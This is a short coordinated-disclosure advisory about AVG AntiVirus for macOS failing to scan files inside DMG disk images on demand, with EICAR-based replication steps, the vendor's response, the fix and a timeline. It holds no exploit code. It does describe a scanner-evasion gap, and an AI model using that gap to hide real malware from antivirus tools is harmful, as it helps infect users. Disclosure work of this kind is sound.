AVG AntiVirus for MacOS Doesn’t Scan Inside Disk Images [CVE-2017-9977]

Summary

AVG AntiVirus for MacOS does not scan files inside disk images (DMG) files in the on-demand scanner. Real-time scanning and compressed archives such as ZIP files were scanned properly.

The vendor did not consider this to be a security issue but an enhancement, and released a fix in engine version 4668. MITRE has assigned CVE-2017-9977 for this issue.

Details

AVG provides various anti-virus products for multiple platforms including MacOS. During our testing, we found that AVG AntiVirus for MacOS did not scan files inside disk images (DMG) files.

To replicate, do the following:

  1. Download the EICAR test file.
  2. Open the Disk Utility in MacOS, and create a new image.
  3. Drag the EICAR file to the mounted disk image, then right click on the image and un-mount.
  4. Install AVG antivirus, open AVG and drag the disk image to the real time scanner slot. Observe that no virus is detected.

We did not test other disk image types such as ISO but presume there are probably impacted as well.

Vendor Response

The vendor response is as follows:

OK, we consider this as a new feature request — to traverse DMG file in on-demand scan. But there is no security impact, because once the DMG is mounted, on-access scanner protects you from opening malware files.

Nevertheless, the issue was fixed in engine version 4668 in October 2016, and was confirmed again in version 17.2, virus database 170626-4.

References

CVE ID: CVE-2017-9977

Credits

Advisory written by Yakov Shafranovich.

Timeline

2016-05-08: Initial report to the vendor via BugCrowd
2016-05-10: Follow up report to the vendor
2016-05-12: Communication with the vendor
2016-05-13: Issue confirmed by the vendor
2016-10-05: Fix released and confirmed
2017-04-18: Request for public disclosure via BugCrowd
2017-04-19: Vendor is ok with public disclosure, asks for advance copy of the advisory
2017-06-28: Fix re-confirmed and proposed advisory shared with the vendor
2017-07-06: Public disclosure

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s